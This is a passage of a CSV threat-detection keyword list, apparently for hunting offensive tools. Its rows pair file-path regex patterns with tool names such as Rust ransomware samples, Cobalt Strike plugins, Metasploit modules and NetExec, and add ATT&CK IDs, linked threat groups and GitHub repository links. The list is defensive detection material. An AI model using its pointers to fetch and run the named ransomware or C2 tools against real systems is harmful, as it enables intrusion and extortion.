"*/Encryfer-X.exe*","NA","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","6946"
"*/Encrypor-X.exe*",".{0,1000}\/Encrypor\-X\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","1","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","6947"
"*/EncryptedZIP.exe*",".{0,1000}\/EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6948"
"*/encryption_aes.exe*",".{0,1000}\/encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6949"
"*/encryption_rc4.exe*",".{0,1000}\/encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6950"
"*/endpoint_takeover.py*",".{0,1000}\/endpoint_takeover\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","6951"
"*/enip-info.nse*",".{0,1000}\/enip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6952"
"*/enum__secrets/*.py*",".{0,1000}\/enum__secrets\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6953"
"*/enum_av.md*",".{0,1000}\/enum_av\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6954"
"*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6955"
"*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6956"
"*/enum_cisco.md*",".{0,1000}\/enum_cisco\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6957"
"*/enum_dns.py*",".{0,1000}\/enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6958"
"*/enum_domain_info*",".{0,1000}\/enum_domain_info.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","6959"
"*/enum_f5.md*",".{0,1000}\/enum_f5\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6960"
"*/enum_juniper.md*",".{0,1000}\/enum_juniper\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6961"
"*/enum_osx.md*",".{0,1000}\/enum_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6962"
"*/enum_proxy.md*",".{0,1000}\/enum_proxy\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6963"
"*/enum_services.md*",".{0,1000}\/enum_services\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6964"
"*/enum_shares.*",".{0,1000}\/enum_shares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6965"
"*/enum_snmp.md*",".{0,1000}\/enum_snmp\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6966"
"*/enum4linux.py*",".{0,1000}\/enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","#linux","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6967"
"*/EnumCLR.c*",".{0,1000}\/EnumCLR\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6968"
"*/enumerate.cna*",".{0,1000}\/enumerate\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","6969"
"*/enumerate/enumerate.py*",".{0,1000}\/enumerate\/enumerate\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","#linux","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","6970"
"*/EnumerateDCs.ahk*",".{0,1000}\/EnumerateDCs\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6971"
"*/enumeration/azureAd.py*",".{0,1000}\/enumeration\/azureAd\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6972"
"*/enumeration/azureAzService.py*",".{0,1000}\/enumeration\/azureAzService\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6973"
"*/enumeration/subdomain.py*",".{0,1000}\/enumeration\/subdomain\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6974"
"*/enumeration/userenum.py*",".{0,1000}\/enumeration\/userenum\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6975"
"*/enumeration_process.exe*",".{0,1000}\/enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6976"
"*/epmd-info.nse*",".{0,1000}\/epmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6977"
"*/eppc-enum-processes.nse*",".{0,1000}\/eppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6978"
"*/Erebus/*.dll*",".{0,1000}\/Erebus\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","6985"
"*/Erebus/*.exe*",".{0,1000}\/Erebus\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 